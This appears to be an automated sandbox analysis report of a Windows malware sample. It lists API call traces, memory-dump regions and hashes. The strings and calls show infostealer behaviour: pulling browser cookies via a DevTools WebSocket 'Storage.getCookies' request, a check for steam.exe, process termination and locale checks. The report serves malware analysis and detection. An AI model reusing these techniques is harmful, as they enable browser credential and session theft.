                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                              • Instruction ID: 12755d3efac3abd4d4d37ebce8a4c408e732f629df63507a7111e641435574bc
                              • Opcode Fuzzy Hash: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                              • Instruction Fuzzy Hash: 47617371910519AFCF25EF74DC88EEE77B8EF59300F0044A8E54AA7251DB34AA58CF90
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-758292691
                              • Opcode ID: cede120412e79b39a344fc285e3b575b7e642e44be41da67ebb61509d3458735
                              • Instruction ID: e0e674b711dbb6658770380e57a75b966d77e8beaa56e16b878299faf818c4f8
                              • Opcode Fuzzy Hash: cede120412e79b39a344fc285e3b575b7e642e44be41da67ebb61509d3458735
                              • Instruction Fuzzy Hash: B1A26971E012699FDF21DFA8C880BEDBBB6BF48304F1485A9D609A7641DB705E85CF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                              • lstrlen.KERNEL32(\*.*), ref: 003A240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                              • Instruction ID: d0d1bb37d2db5da67252bab9e29f87a40fe6bd287551079b58b8257e883a8058
                              • Opcode Fuzzy Hash: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                              • Instruction Fuzzy Hash: 67415E32512A19ABCF33EF29DC8AE9F77A4EF15304F055164F84A9B252CF349C158B94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                              • StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                              • CloseHandle.KERNEL32(00000000), ref: 003B4718
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                              • CloseHandle.KERNEL32(00000000), ref: 003B4731
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                              • Instruction ID: 79a5a39ab2ce0c030aa0bc7451dce82cbbb166c1dc8a4cf046e71d9ba3f09038
                              • Opcode Fuzzy Hash: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                              • Instruction Fuzzy Hash: 0501D232601524AFE7215B60DC8DFFA377CEB99B05F000088FA05E1180EF749989EBA5
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 003B4628
                              • Process32First.KERNEL32(00000000,00000128), ref: 003B4638
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B464A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 003B4660
                              • Process32Next.KERNEL32(00000000,00000128), ref: 003B4672
                              • CloseHandle.KERNEL32(00000000), ref: 003B467D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              • Opcode ID: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                              • Instruction ID: 2a92ac13eb28b8f28aa40ea42f99a3f79736704df8ff0f8606328744c85784f0
                              • Opcode Fuzzy Hash: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                              • Instruction Fuzzy Hash: 1701AD716015289FD721AB60AC4DFEA77BCEF19350F0001D9EE08E1040EF74DA989BE5
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                              • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID:
                              • API String ID: 2567437900-0
                              • Opcode ID: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                              • Instruction ID: 1127d08028988e992b2430a66cf1cb3ae6066d4a37be7743382af08208bddbda
                              • Opcode Fuzzy Hash: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                              • Instruction Fuzzy Hash: 5E311B32522916ABCB23EF64EC8AE9F77A5AF91700F051124F8459B251CB70DC158BA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =S4($N@F*$ZO$^X:$_k|$}~q$8C.$Raw
                              • API String ID: 0-4080121987
                              • Opcode ID: abe10358037ca5a2e5757005ce1ca3b466d5d1d7647f3165d7d3956489612c2a
                              • Instruction ID: 431a41740620edad04d188ee48c690769cd340c3744637c9ec6d3ccadb07e29c
                              • Opcode Fuzzy Hash: abe10358037ca5a2e5757005ce1ca3b466d5d1d7647f3165d7d3956489612c2a
                              • Instruction Fuzzy Hash: 15B2F8F360C204AFE304AE2DEC4566ABBE5EFD4720F16893DEAC4C3744E63598158697
                              APIs
                                • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2D9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B2DAD
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2DBA
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003B2DEC
                              • LocalFree.KERNEL32(00000000), ref: 003B2FCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 77cbe64be01b4c2c11a782e279307be360d98e4843327a5bda5abecfca49a93c
                              • Instruction ID: a05851bb9ee65e48b05a621ae6aef9e5c3abed66fc6751a6f87950e773615f83
                              • Opcode Fuzzy Hash: 77cbe64be01b4c2c11a782e279307be360d98e4843327a5bda5abecfca49a93c
                              • Instruction Fuzzy Hash: 4FB1F870900614CFC716CF59C988BA6B7F1FF44318F2AC2A9D5099B6A2D776DD86CB80
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !c"d$.lvo$Obn#$ResY$Rq.k$cl;O$ok
                              • API String ID: 0-3884299317
                              • Opcode ID: 3a2ba61c400f7556ed52ffb558f3dde29c1f57518714ec45cedc80407abfcd78
                              • Instruction ID: 47512de7ef12e7fd4fa0c434f69834c6ccba2f47758adeb9eb810919dd7c47ab
                              • Opcode Fuzzy Hash: 3a2ba61c400f7556ed52ffb558f3dde29c1f57518714ec45cedc80407abfcd78
                              • Instruction Fuzzy Hash: 02B205F360C2049FE308AE29EC9567ABBE9EF94720F1A493DE6C5C3744E63558018797
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2C42
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2C49
                              • GetTimeZoneInformation.KERNEL32(?), ref: 003B2C58
                              • wsprintfA.USER32 ref: 003B2C83
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              • Opcode ID: 011b2539de97e9d90aba4a957fa3374f6b0c79bec6db848e17cd059da7a8e846
                              • Instruction ID: cc02533ab3ac6ea7263d969a1411562fd8d5f18ac769303de1054359b4e10d8f
                              • Opcode Fuzzy Hash: 011b2539de97e9d90aba4a957fa3374f6b0c79bec6db848e17cd059da7a8e846
                              • Instruction Fuzzy Hash: 7601F271A00A04AFCB188B58DC0EFAABB69EB84721F004369F916DB6C0D77429088AD1
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 003B1B72
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B184F
                                • Part of subcall function 003B1820: lstrlen.KERNEL32(00F16E90), ref: 003B1860
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B1887
                                • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,00000000), ref: 003B1892
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18C1
                                • Part of subcall function 003B1820: lstrlen.KERNEL32(003C4FA0), ref: 003B18D3
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B18F4
                                • Part of subcall function 003B1820: lstrcat.KERNEL32(00000000,003C4FA0), ref: 003B1900
                                • Part of subcall function 003B1820: lstrcpy.KERNEL32(00000000,00000000), ref: 003B192F
                              • sscanf.NTDLL ref: 003B1B9A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BB6
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003B1BC6
                              • ExitProcess.KERNEL32 ref: 003B1BE3
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
